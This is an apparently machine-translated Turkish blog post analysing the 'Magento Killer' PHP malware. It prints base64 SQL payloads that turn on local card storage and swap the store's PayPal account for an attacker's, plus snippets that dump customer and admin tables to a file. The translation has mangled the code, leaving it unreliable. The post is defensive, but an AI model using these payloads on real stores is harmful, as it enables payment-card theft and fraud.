Magento Katili: Magento Mağazalarına Yeni Bir Güvenlik Tehdidi

admin Haberler Leave a comment 5 Views


Bu yazıda Magento Killer hakkında bilmeniz gereken her şeyi öğreneceksiniz.

Ne olduğunu.

Magento mağazanızı nasıl etkiler.

(Ve hepsinden önemlisi) e-ticaret mağazanızın güvenliğini nasıl sağlayabilirsiniz.

Hemen dalalım.

Magento Katili nedir?

Magento Killer, bilgisayar korsanlarının müşterinin ödeme bilgilerini Magento veritabanından çalmak için core_config_data tablosunu değiştirmek için kullandıkları kötü amaçlı bir PHP betiğidir . Esas olarak 2 nesne kullanır – DB'yi Güncelle (Savecc) ve PP'yi Güncelle (MailPP).

E-ticaret mağazanızın güvenliğini sağlamak artık her zamankinden daha önemli hale geldi. Müşterilerinin kişisel ve ödeme verilerini korumak her Magento mağazası sahibinin sorumluluğundadır. Kullanıcı, platform güvenliğini, belirli bir çevrimiçi mağazanın seçimini doğrudan etkileyebilecek hayati bir güven faktörü olarak görür.

Hedefli saldırılar için Amerika Birleşik Devletleri ve Hindistan 1. Sırada

Hindistan veya ABD'de bir e-ticaret mağazanız varsa, sizin için bazı şok edici haberler var. ABD, hedefli saldırılar için 1 numaralı hedef, ardından Hindistan. İşte bu tür saldırılardan en çok etkilenen ilk 10 ülkenin dağılımı: –

hedefli magento katil saldırıları

Kaynak: Norton

Magento, tüm dünyada 250.000'den fazla web sitesine güç sağlar. Bu nedenle, genellikle siber suçluların veya bilgisayar korsanlarının hedefi olması şaşırtıcı olmamalıdır.

Gizli verilere erişebilmek için Magento mağaza yapılandırmanızda her zaman boşluklar ararlar.

$ConfKiller Nasıl Çalışır?

$ConfKiller veya Magento killer, müşterilerin ödeme bilgilerini çalmak için kötü niyetli işlemler gerçekleştirir.

İlk adım, base64'te kodlanmış özel SQL sorgularına bir saldırıdır.

Bu şu şekilde görünebilir: –

 $ConfKiller = dizi( 
         'DB'yi güncelle (Savecc)' =>
base64_decode ( 'VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs ='),
//UPDATE 'core_config_data' SET 'scope' = 'varsayılan', 'scope_id' = '0', 'path' = 'ödeme/ccsave/etkin', 'değer' = '1' WHERE 'path' = 'ödeme/ ccsave/etkin';
         'PP'yi güncelle (MailPP)' =>
base64_decode ( 'VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7')
//UPDATE 'core_config_data' SET 'scope' = 'varsayılan', 'scope_id' = '0', 'path' = 'paypal/general/business_account', 'değer' = '[redacted]@gmail.com' WHERE ' yol` = 'paypal/genel/iş_hesabı';

$ConfKiller dizisinde enfeksiyondan sorumlu olan başlıca 2 nesne vardır. Bu 2, bilgisayar korsanlarının bilgileri kolayca çalmasını ve istedikleri yere aktarmalarını sağlar.

  1. Update DB (Savecc): Magento deposunu, kredi kartı bilgilerini yetkili ödeme işlemcisine göndermek yerine ödeme verilerini sunucuya kaydedecek şekilde yapılandırır.
  2. PP'yi Güncelle (MailPP): Bu, web sitesine bağlı satıcının PayPal hesabını bilgisayar korsanının hesabıyla değiştirir.

Magento, müşterinin verilerini korumak için yerel olarak kaydedilen ödeme ayrıntılarını şifreler, ancak siteniz Magento Killer ile saldırıya uğrarsa bu da başarısız olur.

Saldırgan, bu kötü amaçlı komut dosyasını kullanarak Magento'nun şifreleme anahtarını içeren ./app/etc/local.xml dosyasına erişebilir . Anahtar elde edildikten sonra, sahte işlemler için daha fazla kullanmak veya başka birine satmak için ödeme bilgilerinin şifresini düz metne dönüştürürler.

İkinci adım, Magento veritabanlarından veri çalmak

Ancak kredi kartı numarasını çalmak bozuk işlem yapmak için yeterli değildir, hacker'ın müşterinin kişisel bilgilerine sahip olması gerekir. Doğru adı, e-posta adresini ve kalıcı adresi içerebilir .

1. Bu ek verileri çalmak için, Magento'nun enjekte edilmiş veritabanından SQL sorgularında kullanılan başka bir komut dosyası çalıştırırlar.

 $sorgu = dizi(
'admin_user' => 'admin_user'DAN * SEÇİN',
'aw_blog_comment' => 'aw_blog_comment'tan * SEÇİN',
'core_email_queue_recipients' => 'core_email_queue_recipients'TEN * SEÇİN',
'customer_entity' => 'customer_entity'DEN * SEÇİN',

2. Magento veritabanı tablolarında depolanan tüm müşteri bilgilerini çıkarır.

3. Ardından, yalnızca hileli satın alma işlemleri için gerekli bilgileri saklayarak bu verileri keser. Son olarak, ilgili müşteri bilgilerini içeren dizinde bir *-shcMail.txt dosyası oluşturur.

 $ad dosyası = md5(zaman()).."-shcMail.txt";
foreach ($shc_key olarak $sorgu => $shc_query) {
$hasil = mysql_query($shc_query);
    while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
        $mail[] = $kolom_db[$shcolom[$shc_key]];
        $myfile = fopen($namefile, "a+") or die("Dosya açılamıyor!");
        fwrite($dosyam, $kolom_db[$shcolom[$shc_key]]."rn");
        fclose($dosyam);

E-ticaret mağazanızı Magento Killer'dan nasıl koruyabilirsiniz?

1. Güncel kalın

Magento'nun en son sürümünü kullanarak her zaman en üst düzeyde güvenlikte kalın. Hala eski sürümleri kullanıyorsanız, web sitenizin güvenliğinden ödün veriyorsunuz ve müşterilerinizin verilerini riske atıyorsunuz.

2. WAF'yi kullanın

Web Uygulaması Güvenlik Duvarı'nın kısaltması olan WAF, Magento mağazanız için genişletilmiş bir güvenlik katmanı sunar. Bilgisayar korsanları ve dolandırıcılar gibi siber suçlular, bir MySQL ifadesi enjekte etmek için formlarınızın alanlarını ve verilerini kullanır.

Mağazanızın güvenliğini sağlamak için Magento Güvenlik Kılavuzumuzu inceleyin .

3. İki Adımlı Kimlik Doğrulamayı Etkinleştirin

İki adımlı kimlik doğrulama, herhangi bir davetsiz misafirin web sitenize erişmesini engelleyerek e-ticaret güvenliğinizi artıran bir özelliktir.

İki faktörlü kimlik doğrulamayı etkinleştirdiğinizde, normal oturum açma ayrıntılarından daha fazlasına sahip olmanız gerekir. Hesabınıza giriş yapmak için kullanıcı adınız ve şifrenizden ayrı olarak başka bir bilgiye ihtiyacınız olacağı anlamına gelir. Örneğin, tek seferlik bir kod.

Hala Magento Güvenlik sorunlarınız varsa, Magento Uzmanlarımız size yardımcı olmak için burada. ServerGuy, sitenizin bu tür saldırılardan korunması için tamamen güvenli Magento barındırma hizmetleri sunar.

Magento Barındırma afişi

Ayrıca aşağıya bir yorum bırakabilirsiniz ve kesinlikle size geri döneceğiz.

Copyright statement: Unless otherwise noted, this article is Collected from the Internet, please keep the source of the article when reprinting.

Tags

Check Also

Divi's Theme Builder ile Özel Global Başlık Nasıl Oluşturulur

Artık Tema Oluşturucu burada olduğuna göre, web sitenizi A'dan Z'ye kurmanıza yardımcı olacak yeni eğitimlere dalmak için sabırsızlanıyoruz. Buna Divi'nin yerleşik seçeneğini kullanarak özel başlıklar oluşturma da dahildir. Bu eğitimde Divi's Theme Builder'ı kullanarak global bir başlık oluşturmaya odaklanacağız. Bu sayfaya veya gönderiye farklı bir başlık atamadıysanız, web sitenizin her yerinde genel bir başlık görünecektir.

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Powered by WordPress | Designed by TieLabs
© Copyright 2026, All Rights Reserved